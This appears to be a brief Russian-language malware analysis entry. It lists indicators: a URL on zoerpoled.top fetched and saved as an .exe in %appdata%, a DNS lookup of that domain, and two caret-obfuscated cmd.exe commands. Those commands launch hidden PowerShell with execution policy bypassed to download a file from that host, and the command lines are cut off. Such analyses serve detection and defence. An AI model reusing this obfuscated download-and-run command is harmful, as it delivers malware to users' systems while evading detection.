Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOweR^Sh^Ell^.e^X^e -E^XecUtiOn^pOlIC^y^ bypa^s^s ^-nopROfI^le^ -WiN^Dows^TyLe^ ^HIdden (new-^O^bJe^Ct SY^STE^M.nE^T^.^W^eBCl^ieNt^).Down^L^oA^dfil^e^(^'http://www.zoerpole...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "pOweR^Sh^Ell^.e^X^e -E^XecUtiOn^pOlIC^y^ bypa^s^s ^-nopROfI^le^ -WiN^Dows^TyLe^ ^HIdden (new-^O^bJe^Ct SY^STE^M.nE^T^.^W^eBCl^ieNt^).Down^L^oA^dfil^e^(^'http://www.zoerpole...' (со скрытым окном)